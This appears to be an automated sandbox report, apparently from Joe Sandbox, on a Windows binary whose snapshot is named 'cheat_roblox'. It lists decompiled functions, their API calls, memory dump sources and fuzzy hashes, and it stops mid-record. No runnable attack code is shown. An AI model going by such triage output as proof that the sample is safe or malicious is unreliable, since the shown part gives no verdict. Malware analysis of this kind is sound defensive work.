                                                                              control_flow_graph 3895 7ff693e62ce0-7ff693e62d0a 3896 7ff693e62d0c-7ff693e62d0e 3895->3896 3897 7ff693e62d13-7ff693e62d1b 3895->3897 3898 7ff693e62ea9-7ff693e62ec4 call 7ff693e82320 3896->3898 3899 7ff693e62d2b 3897->3899 3900 7ff693e62d1d-7ff693e62d28 GetStdHandle 3897->3900 3902 7ff693e62d31-7ff693e62d3d 3899->3902 3900->3899 3904 7ff693e62d86-7ff693e62da2 WriteFile 3902->3904 3905 7ff693e62d3f-7ff693e62d44 3902->3905 3906 7ff693e62da6-7ff693e62da9 3904->3906 3907 7ff693e62d46-7ff693e62d7a WriteFile 3905->3907 3908 7ff693e62daf-7ff693e62db3 3905->3908 3906->3908 3909 7ff693e62ea2-7ff693e62ea6 3906->3909 3907->3906 3911 7ff693e62d7c-7ff693e62d82 3907->3911 3908->3909 3910 7ff693e62db9-7ff693e62dbd 3908->3910 3909->3898 3910->3909 3913 7ff693e62dc3-7ff693e62dd8 call 7ff693e5b4f8 3910->3913 3911->3907 3912 7ff693e62d84 3911->3912 3912->3906 3916 7ff693e62dda-7ff693e62de1 3913->3916 3917 7ff693e62e1e-7ff693e62e6d call 7ff693e8797c call 7ff693e5129c call 7ff693e5bca8 3913->3917 3916->3902 3919 7ff693e62de7-7ff693e62de9 3916->3919 3917->3909 3928 7ff693e62e6f-7ff693e62e86 3917->3928 3919->3902 3921 7ff693e62def-7ff693e62e19 3919->3921 3921->3902 3929 7ff693e62e9d call 7ff693e8220c 3928->3929 3930 7ff693e62e88-7ff693e62e9b 3928->3930 3929->3909 3930->3929 3931 7ff693e62ec5-7ff693e62ecb call 7ff693e87904 3930->3931
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$Handle
                                                                              • String ID:
                                                                              • API String ID: 4209713984-0
                                                                              • Opcode ID: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                              • Instruction ID: edcd4770f60d478c4330085395b56b322896b44f7fb9b5818e3c5d9e6c87e1a9
                                                                              • Opcode Fuzzy Hash: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                              • Instruction Fuzzy Hash: 2C51E322A19A4682FB31CB25D44677E2368FF95B98F444173EB0D96AA1DF7CE885C300
                                                                              Function 00007FF693E803E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                              • String ID:
                                                                              • API String ID: 3750147219-0
                                                                              • Opcode ID: 304a46596dca69ecdbc91b92e1cd8bc705ebb4ffd666d07f6fcf63e11144534b
                                                                              • Instruction ID: eab199dfc5f41b5c8bc0bee6cb9807a1602003727ba95895027b5edbe5b2f4e4
                                                                              • Opcode Fuzzy Hash: 304a46596dca69ecdbc91b92e1cd8bc705ebb4ffd666d07f6fcf63e11144534b
                                                                              • Instruction Fuzzy Hash: 8D51D3A2F1565284FF20DBA4D8462AD232AFF45B94F400273DA1CA6BE5DF6CD840C310
                                                                              Function 00007FF693E63684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2359106489-0
                                                                              • Opcode ID: b5c683663b1c3982ad31c560a34f1169cd3854c9fd4e60f6051e696d97cb7788
                                                                              • Instruction ID: ddc18575b0f251b4c28fb4f8236fe2a95da3cd9ee2bdd5d5289c715bf6b9b551
                                                                              • Opcode Fuzzy Hash: b5c683663b1c3982ad31c560a34f1169cd3854c9fd4e60f6051e696d97cb7788
                                                                              • Instruction Fuzzy Hash: 3F31D662E0C64A41EA719B25944627E7369FF887A8F500273EF9DE26E5CF3CE4458600
                                                                              Function 00007FF693E82D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                              • String ID:
                                                                              • API String ID: 1452418845-0
                                                                              • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                              • Instruction ID: c05664f328ba708327caf85b1a91c0d97e685cbbd26e79d6b81e612d24099819
                                                                              • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                              • Instruction Fuzzy Hash: 05315025E0C24782FA76AB6594133B91399EF45784F4404B7E94EFB2E7DE2CB8098345
                                                                              Function 00007FF693E62320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FileHandleRead
                                                                              • String ID:
                                                                              • API String ID: 2244327787-0
                                                                              • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                              • Instruction ID: 266b411b88ad66c67041b2c260050839750e0b39e66b107c47a22a3aadd6f962
                                                                              • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                              • Instruction Fuzzy Hash: 7321A121E4C64382EA709F21A40233D73A8FB85B9CF144572DB9DEA698DF7CF8858711
                                                                              Function 00007FF693E6E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E6ECD8: ResetEvent.KERNEL32 ref: 00007FF693E6ECF1
                                                                                • Part of subcall function 00007FF693E6ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF693E6ED07
                                                                              • ReleaseSemaphore.KERNEL32 ref: 00007FF693E6E974
                                                                              • FindCloseChangeNotification.KERNELBASE ref: 00007FF693E6E993
                                                                              • DeleteCriticalSection.KERNEL32 ref: 00007FF693E6E9AA
                                                                              • CloseHandle.KERNEL32 ref: 00007FF693E6E9B7
                                                                                • Part of subcall function 00007FF693E6EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA63
                                                                                • Part of subcall function 00007FF693E6EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA6E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2143293610-0
                                                                              • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                              • Instruction ID: c4f46ae9de6bd5979e940b4fb940486588913e8edc87046fcd2966b417038557
                                                                              • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                              • Instruction Fuzzy Hash: 3E014032A14A9192E668DF21E94626DB334FBC4BD0F004072EB5DA3665CF39E4B5C740
                                                                              Function 00007FF693E6EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$CreatePriority
                                                                              • String ID: CreateThread failed
                                                                              • API String ID: 2610526550-3849766595
                                                                              • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                              • Instruction ID: 894d1cc15ea4167bdd0d0b572f49e5e4dfda4385a49aac866326e140642d6fdc
                                                                              • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                              • Instruction Fuzzy Hash: 53116031A09B4281FB21DF11F8421A97378FBC4798F548177E64DA6669DF7CE985C700
                                                                              Function 00007FF693E7946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryInitializeMallocSystem
                                                                              • String ID: riched20.dll
                                                                              • API String ID: 174490985-3360196438
                                                                              • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                              • Instruction ID: 372393415f890911b30f25ca8ca56e3676621eada532abfdc0eaa998dc88b9ea
                                                                              • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                              • Instruction Fuzzy Hash: 36F04F71A18B4182EB619F21F41626AB3B4FF88754F800176EA8E96B54DF7CE559CB00
                                                                              Function 00007FF693E7095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E7853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF693E7856C
                                                                                • Part of subcall function 00007FF693E6AAE0: LoadStringW.USER32 ref: 00007FF693E6AB67
                                                                                • Part of subcall function 00007FF693E6AAE0: LoadStringW.USER32 ref: 00007FF693E6AB80
                                                                                • Part of subcall function 00007FF693E51FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E51FFB
                                                                                • Part of subcall function 00007FF693E5129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF693E51396
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E801BB
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E801C1
                                                                              • SendDlgItemMessageW.USER32 ref: 00007FF693E801F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                              • String ID:
                                                                              • API String ID: 3106221260-0
                                                                              • Opcode ID: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                              • Instruction ID: c6d5b6d170787435a7f53856443b6d3b732e9697920135de31e7985b1570d799
                                                                              • Opcode Fuzzy Hash: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                              • Instruction Fuzzy Hash: B951BF62F046429AFF209BA5D4422FD236AEB85BD8F400577DE1DAB796DE2CE941C340
                                                                              Function 00007FF693E62134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2272807158-0
                                                                              • Opcode ID: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                              • Instruction ID: eb51b1d59552f8c9c6415335e0de62c05234d6e734407bf3a62a40366cca6955
                                                                              • Opcode Fuzzy Hash: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                              • Instruction Fuzzy Hash: F141D172A1878682EB208B25E44627973A4FB84BB8F105376DFAD53AD5CF3CE4908700
                                                                              Function 00007FF693E523F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2176759853-0
                                                                              • Opcode ID: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
                                                                              • Instruction ID: 2b6bdeee4d52ea137582a94fea8eee745c9411748d4d38829eb20266820a34a6
                                                                              • Opcode Fuzzy Hash: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
                                                                              • Instruction Fuzzy Hash: F421B472A18B8581EA248B65B44117AB3A8FB89BD0F144236EFDDA3B95CF3CD181C700
                                                                              Function 00007FF693E71F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 1875163511-0
                                                                              • Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                              • Instruction ID: 60e68ecdb0043abb1c0cf6c666cd1c5c8d13a3cfe10a57857733c63b34f0ee5d
                                                                              • Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                              • Instruction Fuzzy Hash: BC31D812E0D68A52FB349714E4463B963B8FF40784F544077D24DA66AADF7CE956C302
                                                                              Function 00007FF693E63D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1203560049-0
                                                                              • Opcode ID: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                              • Instruction ID: 0864c3c8382989b5adc9db82d1bdd1415516ab651b73eebf4af21d81d03eddbb
                                                                              • Opcode Fuzzy Hash: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                              • Instruction Fuzzy Hash: 5121F832B1878581EA318F25E44626D7364FF88B98F005272EF9ED26A5DF3CD540C700
                                                                              Function 00007FF693E631BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3118131910-0
                                                                              • Opcode ID: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                              • Instruction ID: e6ace5de03907fe5eceee18839f008f9b4cf95f3e320f2327543862a5154ba59
                                                                              • Opcode Fuzzy Hash: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                              • Instruction Fuzzy Hash: BB219832A1878581EE308B25F44626E7364FB85B98F505272EB9E96AA5DF3CD541C700
                                                                              Function 00007FF693E632BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
